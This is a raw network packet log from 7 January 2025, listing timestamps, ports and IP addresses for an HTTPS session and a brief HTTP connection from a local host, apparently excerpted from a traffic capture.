Jan 7, 2025 11:02:04.125652075 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.125689030 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.125720024 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.125749111 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.125754118 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.125763893 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.125777006 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.125797987 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.125804901 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.125816107 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.126017094 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.126063108 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.126070023 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.126102924 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.126122952 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.126127958 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.126141071 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.126152039 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.126193047 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.126197100 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.126235962 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.126245975 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.126250982 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.126283884 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.169708967 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.210696936 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.210730076 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.210783005 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.210817099 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.210834026 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.210859060 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.210930109 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.210978985 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.211072922 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.211143017 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.211169004 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.211178064 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.211193085 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.211205006 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.211256027 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.211263895 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.211303949 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.211513042 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.211554050 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.211560965 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.211569071 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.211595058 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.211599112 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.211611986 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.211617947 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.211641073 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.211646080 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.211698055 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.211704969 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.211740971 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.211744070 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.211755037 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.211783886 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.211810112 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.211849928 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.211855888 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.211864948 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.211899996 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.211952925 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.212008953 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.212017059 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.212055922 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.212059021 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.212069035 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.212105036 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.212301016 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.212348938 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.212357044 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.212368011 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.212374926 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.212409973 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.212450981 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.212492943 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.212498903 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.212529898 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.212555885 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.212562084 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.212574959 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.212606907 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.212642908 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.212654114 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.212665081 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.212702990 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.212775946 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.212819099 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.212829113 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.212862968 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.235945940 CET	49717	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:04.240811110 CET	80	49717	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:04.240890026 CET	49717	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:04.243046045 CET	49717	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:04.247837067 CET	80	49717	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:04.247900963 CET	49717	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:04.252768040 CET	80	49717	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:04.302906036 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303008080 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303035975 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.303047895 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303057909 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303060055 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.303107977 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.303112984 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303122044 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303163052 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303165913 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.303181887 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.303200006 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303215027 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303217888 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.303256035 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303270102 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.303276062 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303306103 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.303352118 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303400040 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.303406000 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303440094 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303447962 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.303455114 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303484917 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.303623915 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303663969 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303673029 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.303679943 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303711891 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.303874969 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303911924 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303915977 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.303921938 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303956985 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303965092 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.303971052 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303988934 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.303999901 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.304018021 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.304022074 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.304033995 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.304049015 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.304079056 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.304088116 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.304148912 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.304224014 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.304267883 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.304312944 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.304339886 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.304359913 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.304366112 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.304378986 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.304394960 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.304414988 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.304419994 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.304433107 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.304446936 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.304475069 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.304480076 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.304522991 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.304588079 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.304634094 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.304649115 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.304696083 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.304708958 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.304754019 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.304955959 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.304996967 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.305011988 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.305018902 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.305032015 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.305032015 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.305061102 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.305083036 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.305089951 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.305115938 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.305196047 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.305226088 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.305247068 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.305253983 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.305283070 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.305288076 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.305335999 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.305347919 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.305389881 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.390459061 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.390537024 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.390563965 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.390577078 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.390609980 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.390630960 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.390677929 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.390712023 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.390738964 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.390743971 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.390769005 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.390775919 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.390798092 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.390804052 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.390815020 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.390830994 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.390861034 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.390865088 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.390911102 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.391042948 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.391077042 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.391093016 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.391103983 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.391109943 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.391139984 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.391165018 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.391263962 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.391302109 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.391316891 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.391323090 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.391350031 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.391357899 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.391371965 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.391383886 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.391393900 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.391410112 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.391439915 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.391446114 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.391453028 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.391484976 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.391514063 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.391565084 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.391571045 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.391587973 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.391617060 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.391623974 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.391649961 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.391714096 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.391746998 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.391765118 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.391772032 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.391794920 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.391846895 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.391900063 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.391906023 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.391912937 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.391963005 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.391969919 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.392069101 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.392113924 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.392119884 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.392131090 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.392160892 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.392167091 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.392175913 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.392193079 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.392210960 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.392225981 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.392231941 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.392256021 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.392257929 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.392301083 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.392307043 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.392349005 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.392359972 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.392451048 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.392477036 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.392509937 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.392524004 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.392529011 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.392545938 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.392580032 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.392580032 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.392585993 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.392596960 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.392606974 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.392637014 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.392646074 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.392657995 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.392700911 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.392796040 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.477792978 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.477869034 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.477956057 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.478018999 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.478043079 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.478096962 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.478116989 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.478173018 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.478176117 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.478183031 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.478214979 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.478214979 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.478265047 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.478272915 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.478322029 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.479090929 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479145050 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479151964 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.479157925 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479195118 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479197025 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.479216099 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.479221106 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479233027 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479245901 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.479276896 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.479281902 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479334116 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.479351044 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479392052 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479409933 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.479415894 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479435921 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479449034 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.479463100 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.479466915 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479492903 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.479556084 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479604959 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479613066 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.479619980 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479646921 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479654074 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.479695082 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.479701042 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479708910 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479736090 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.479742050 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479757071 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.479799986 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479854107 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.479860067 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479891062 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479903936 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.479909897 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.479952097 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.479969978 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.480017900 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.480021954 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.480027914 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.480068922 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.480077982 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.480124950 CET	443	49713	194.15.112.248	192.168.2.5
